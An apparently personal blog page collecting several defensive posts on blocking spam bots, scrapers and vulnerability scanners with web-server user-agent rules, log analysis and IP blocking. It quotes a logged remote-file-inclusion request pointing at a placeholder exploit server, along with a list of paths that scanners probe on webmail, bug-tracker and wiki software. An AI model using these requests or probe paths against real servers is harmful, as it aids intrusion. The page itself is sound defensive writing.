White listing User Agents to combat Spam Bots and Scrapers
Posted 2008-03-21 in Spam by Johann.
IncrediBill mentioned white listing user agents to block spam bots and other types of abusers. I then tried out white listing as opposed to black listing as I did before.
Here is a short explanation of the difference between black listing and white listing.
Black listing
Black listing means rejecting all requests that fit into a certain pattern.
Black listing looks like this in my web server configuration:
$HTTP["useragent"] =~ "(bad_bot|comment spammer|spambot 1)" { url.access-deny = ( "" ) }
This means that all user agent strings containing bad_bot
, comment spammer
or spambot 1
are served a 403 Forbidden
error message.
White listing
White listing means rejecting all request that do not fit into a certain pattern.
White listing looks as follows in my configuration:
$HTTP["useragent"] !~ "^(Mozilla|Opera)" { url.access-deny ( "" ) }
This means that only user agent strings starting with Mozilla or Opera are allowed, everything else is served a 403 Forbidden
error message.
The downside of white listing is that the number of allowed user agents can be very large. As an example, user agents of Motorola cell phones start with Motorola-
, but some also start with MOT-
, MOTOROKR
or even motorazr
.
Right now, I have more than 100 rules in my white list regular expression.
Which one is right for me?
I recommend using black lists if you cannot spend much time reading log files and changing your web server’s configuration. Black listing, combined with IP blocking of known abusers, can still be effective in limiting bandwidth theft.
Black listing, however, will not prepare you against future bad bots and reincarnations of Russian email harvester outfits. This is where white listing is better.
4 comments
Exploit and Vulnerability Scanners using libwww-perl
Posted 2008-08-21 in Spam by Johann.
One of the stranger things I see are the people scanning for vulnerable servers that always use the same libwww-perl
user agent, like in this example:
… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"
These people definitely come around:
$ grep -c '"libwww-perl' <this week’s log> 111
And with the exception of the following outfit, all of the libwww-perl
is used only for vulnerability scanning and exploiting of servers.
$ grep '"libwww-perl' <log> | grep -v http 96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-" 70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
Obviously, the first thing you should do is white listing user agents so that none of the libwww-perl
dirt can slip through and your server is hacked.
Statistics
The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.
Requests |
IP address/Hostname |
Hosting |
Description |
113 |
|
Site5 hosting, Net Access Corporation, US |
|
63 |
|
Level3, US |
|
46 |
|
netdirekt e. K., DE |
|
41 |
|
netdirekt e. K., DE |
|
40 |
|
Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL |
|
35 |
|
Commerical Collocation Ltd, UK |
|
31 |
|
Cabovisao SA, PT |
|
29 |
|
Ravand CyberTech Inc, Performance Systems International Inc., US |
|
27 |
|
Hosteurope GmbH, DE |
|
27 |
|
VIF Internet, CA |
As you can see, the IP addresses are all over the place, geographically and what they’re used for. Also, for half a year, 113 requests isn’t much so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).
I haven’t had one of my servers hacked but one thing I would like to find out if these computers are exploited beyond the vulnerability scanning.
Websense and how to Block Web Sense’s Constant Abuse
Posted 2008-08-26 in Spam by Johann.
Websense, Inc. is one of the busiest net abusers. Their stealth scanning never stops.
208.80.193.26 … "GET / HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 3304; SV1; .NET CLR 1.1.4322)" "-" 208.80.193.37 … "GET /blog/music/ HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Dealio Toolbar 3.1.1; Zango 10.0.370.0)" "-"
If you go through your own log files, you’ll notice that Websense never uses the same user agent twice (simply to never show up in statistics). Here’s how aggressive Websense is:
$ nice gunzip -c <five weeks of log files> | egrep -c '^208.80.19' 414
Over 400 requests in over a month make Websense a lot more aggressive than vulnerability scanners and forum scanners.
Primarily, the abuse is coming from 208.80.193.0/24
.
$ nice gunzip -c <five weeks of log files> | egrep '^208.80.19' | awk '{print($1)}' | sort | uniq -c | sort -r -n 35 208.80.193.31 34 208.80.193.44 33 208.80.193.33 30 208.80.193.27 25 208.80.193.37 25 208.80.193.32 22 208.80.193.46 22 208.80.193.30 21 208.80.193.35 20 208.80.193.42 19 208.80.193.45 18 208.80.193.29 16 208.80.193.39 15 208.80.193.40 14 208.80.193.48 14 208.80.193.34 12 208.80.193.47 11 208.80.193.36 6 208.80.193.41 6 208.80.193.38 5 208.80.193.26 4 208.80.193.59 4 208.80.193.50 2 208.80.193.54 1 208.80.193.43
Block Websense
Here are Web sense’s netblocks. Block all of them.
66.194.6.0/24
67.117.201.128
91.194.158.0/23
192.132.210.0/24
204.15.64.0/21
208.80.192.0/21
9 comments
“Toata dragostea mea pentru” Vulnerability Scanners
Posted 2009-01-16 in Spam by Johann.
I have many visits from people who are interested in vulnerability scanners, whether libwww-perl
or the “Toata dragostea mea pentru diavola” scanners.
Requests
Here are all requests made by them. They did change user agents in the meantime to something cloaked – their latest one is
62.75.224.201 … "GET /roundcubemail-0.1/bin/msgimport HTTP/1.1" 403 4131 "-" "Toata dragostea mea pentru god (god is a girl and this is not a pbot or a browser)"
I wonder what they were smoking…
/bin/configure?action=image
/bin/msgimport
/bt/login_page.php
/bug/login_page.php
/bugs/login_page.php
/bugtrack/login_page.php
/bugtracker/login_page.php
/cgi-bin/configure?action=image
/cube/bin/msgimport
/domain_default_page/index.html
/email/program/js/list.js
/issue/login_page.php
/issuetracker/login_page.php
/login_page.php
/mail/bin/msgimport
/mail/program/js/list.js
/mail/roundcube/bin/msgimport
/mantis/login_page.php
/mantisbt/login_page.php
/msgimport
/portal/login_page.php
/program/js/list.js
/projects/login_page.php
/rc/bin/msgimport
/rc/program/js/list.js
/round/bin/msgimport
/roundcube-0.1/bin/msgimport
/roundcube//bin/msgimport
/roundcube/bin/msgimport
/roundcube/program/js/list.js
/roundcubemail-0.1/bin/msgimport
/roundcubemail-0.2/bin/msgimport
/roundcubemail/bin/msgimport
/roundcubemail/program/js/list.js
/roundcubewebmail/bin/msgimport
/support/login_page.php
/tag/configure?action=image
/tracker/login_page.php
/twiki/bin/configure?action=image
/vhcs/domain_default_page/index.html
/vhcs2/domain_default_page/index.html
/webmail/bin/msgimport
/webmail/program/js/list.js
/webmail/roundcube/bin/msgimport
/wiki/bin/configure?action=image
/wiki/cgi-bin/configure?action=image
/wiki/cgi/configure?action=image
/wikis/bin/configure?action=image
HTTP/1.1
The last line is not a mistake – their code just makes malformed HTTP requests. They also do not send any host headers with the requests. In other words, they do not have a list of domains they’re scanning, just IP addresses. Maybe not even that.
Targets
Just by going through the list of requests, we can see
- webmail systems,
- bug tracking software,
- Wikis and
- unspecified login pages.
Tips
How can you harden your web server against these attacks?
- No default paths. Never install web applications in default paths suggested by installation instructions.
- Remove footprints. Most web applications leave notes in the HTML. “Powered by WordPress” is a very common one. Make sure you remove the most obvious hints.
- No default web sites. Make sure a host header is required. Try
wget -d http://<your IP address>
. You should not get your home page back. - Have a strategy for other types of web abuse. Spamtraps, the ability to block by IP netblock and user agent, firewalls.
11 comments
Pages
Page 1 · Page 2 · Page 3 · Page 4 · Next Page »
Subscribe
RSS 2.0, Atom or subscribe by Email.
Top Posts
- DynaCloud - a dynamic JavaScript tag/keyword cloud with jQuery
- 6 fast jQuery Tips: More basic Snippets
- xslt.js version 3.2 released
- xslt.js version 3.0 released XML XSLT now with jQuery plugin
- Forum Scanners - prevent forum abuse
- Automate JavaScript compression with YUI Compressor and /packer/